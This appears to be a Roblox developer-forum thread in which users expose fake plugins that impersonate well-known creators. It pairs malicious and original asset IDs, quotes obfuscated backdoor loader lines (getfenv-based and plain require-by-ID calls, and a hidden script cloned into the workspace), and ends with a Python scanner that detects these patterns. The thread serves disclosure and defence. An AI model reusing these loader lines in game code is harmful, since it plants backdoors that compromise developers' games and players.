Malicious plugin: 5606261789
Original plugin: 4476041065
For that plugin alone, the friends of these users all look like bots. These are the only two non-bot people that are in the group that produced the malicious plugin.
Group: GizmoTjaz - Roblox --Probably trying to frame someone, actual person’s profile is here: GizmoTjaz - Roblox
DuazDaio: DuazDaio - Roblox
KaspersHub: KaspersHub - Roblox
I have a slight feeling these are stolen accounts, but I’m not sure.
Note: KaspersHub is also in a lot of other groups with similar logos.
I’m pretty sure it’s a backdoor group (and the bot accounts are possibly alts?)
Most likely, but the users I mentioned specifically have robux. I think they were stolen and then linked to all these bot accounts. Whoever did this was really good at covering their tracks. There are hundreds of bots.
Plugin checks for any and all scripts in the game and places multiple lines of requirements saying this:
getfenv()['\114\101\113\117\105\114\101'][5151855975]
Malicious plugin: 6173331887
Original plugin: 866972013
I found another malicious plugin:
Real plugin (ID:6426578337) :
Fake Plugin (ID: 6427852822):
The fake plugin contains some malicious code:
workspace:WaitForChild("\0x54\0x65\0x72\0x72\0x61\0x69\0x6e"):FindFirstChild('\0x47\0x72\0x61\0x73\0x73\0x46\0x58')then a=script:WaitForChild("\0x47\0x72\0x61\0x73\0x73\0x46\0x58"):Clone()a.Parent=workspace:WaitForChild("\0x43\0x61\0x6d\0x65\0x72\0x61")a.Disabled=false;end
And also I found GrassFX script inside of the fake plugin:
And the code sample from the GrassFX script:
Thank you so much, this helped me out a LOT!
This is a virus: Smooth Cam - Roblox
the string is base64 for the intro of The Prince of Belair
contains bytecode interpreters
Also says it is created by @sleitnick, who is a known plugin creator, and his plugins are totally not malicious in any way. Looks like the actual group is trying to impersonate.
How has this not been shut down yet?? He has multiple groups that are obviously meant to impersonate well known developers and teams.
I also found this:
Roblox Studio+
Malicious Plugin: 5871957158
Original Plugin: 144358935
Malicious Script Location: PluginGuiService > PluginGui > Layers > UIListLayout > FX
Malicious Action:
require(5870849966)
Malicious Required Module: 5870849966*
*Suspicious obfuscated code. Assuming this is the source of the backdoor that multiple posts above have connected with the Updated/New mark at the top of the plugin thumbnail.
The plugin was published by a group named ROBLOX to make it seem as if the official ROBLOX account created it.
ROBLOX Impersonation: 8135004
I hooked the functions of the obfuscated module and it seems that it was only calling require to this module MainModule - Roblox
It has a GUI for a server side backdoor service called “Ubuntu SS”, which I have never heard of. Here is a picture.
The logging place for HTTP logs is
and the group for whitelisting seems to be
The module also seems to contain some webhook URLs but they seem invalid. I am not sure if they were previously used for logging and were removed, if they were abused and thus removed, or are just decoys.
Over half of these plugins are real, without any malicious intent.
No plugin from the list is malicious.
I took a look at those plugins’ source and did not find anything. Also I see you have already posted 3 of those plugins on this topic.
I just read through its source, turns out it was a mistake on my end. Sorry for re-posting, didn’t realize that.
Building Tools by F3X (Plugin)
Malicious plugin: 6240474358
Original plugin: 144950355
[FIXED] Realism Mod
Malicious plugin: 6792716290
Original plugin: 400812710
Load Character Lite
Malicious plugin: 6789266789
Original plugin: 752585459
to be continued…
Someone apparently made a copy of AlreadyPro’s Load Character Pro under the name of “AlreadyPro”, a group owned by a deleted account. Reported the plugin for using the code of AlreadyPro and also malicious code.
Malicious:
Original:
Load Character Pro
Original: 4489766693
Malicious: 7070331213
Drops a malicious script. Malicious plugin creator attempting to impersonate AlreadyPro.
Yes
I would also like to report this one as well: Malicious Plugin
It’s a group that impersonates his name to promote their fake plugin.
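Two loader patterns reported in this thread, require by numeric asset ID and a getfenv() lookup whose key is spelled with decimal escapes, can be flagged in exported plugin source with a short scanner. This is an added example, not code from any poster or plugin; the function names are hypothetical and the sample combines the two snippets quoted above with constructed benign lines.

```python
import re

# Lua string escapes: \ddd (up to three decimal digits) or \xHH (two hex digits).
_ESCAPE = re.compile(r"\\(?:x([0-9A-Fa-f]{2})|(\d{1,3}))")
# A single- or double-quoted literal on one line (sufficient for these patterns).
_STRING = r"""(?:"([^"\n]*)"|'([^'\n]*)')"""
# require(<numeric asset id>) pulls in a ModuleScript by ID instead of by path.
_REQUIRE_ID = re.compile(r"\brequire\s*\(\s*(\d{6,})\s*\)")
# getfenv()["..."] followed by (id) or [id], the shape quoted in the thread.
_GETFENV = re.compile(
    r"getfenv\s*\(\s*\)\s*\[\s*" + _STRING + r"\s*\]\s*[\[(]\s*(\d{6,})"
)


def decode_lua_escapes(literal: str) -> str:
    """Resolve \\ddd and \\xHH escapes so a hidden name becomes readable."""
    def repl(m):
        code = int(m.group(1), 16) if m.group(1) else int(m.group(2))
        return chr(code) if code < 256 else m.group(0)
    return _ESCAPE.sub(repl, literal)


def scan_source(source: str):
    """Return (line_no, rule, detail) for each suspicious construct found."""
    findings = []
    for no, line in enumerate(source.splitlines(), 1):
        for m in _REQUIRE_ID.finditer(line):
            findings.append((no, "require-by-id", m.group(1)))
        for m in _GETFENV.finditer(line):
            name = decode_lua_escapes(m.group(1) or m.group(2) or "")
            findings.append((no, "getfenv-lookup", f"{name} -> {m.group(3)}"))
    return findings


# Sample: lines 2 and 3 are the snippets quoted in the posts above;
# lines 1 and 4 are constructed benign code for contrast.
SAMPLE = r"""local Players = game:GetService("Players")
getfenv()['\114\101\113\117\105\114\101'][5151855975]
require(5870849966)
local Util = require(script.Parent.Util)"""

if __name__ == "__main__":
    for finding in scan_source(SAMPLE):
        print(finding)
```

A hit on `require-by-id` is not proof of a backdoor, since legitimate plugins also load modules by ID; it marks the asset to review before the plugin is trusted.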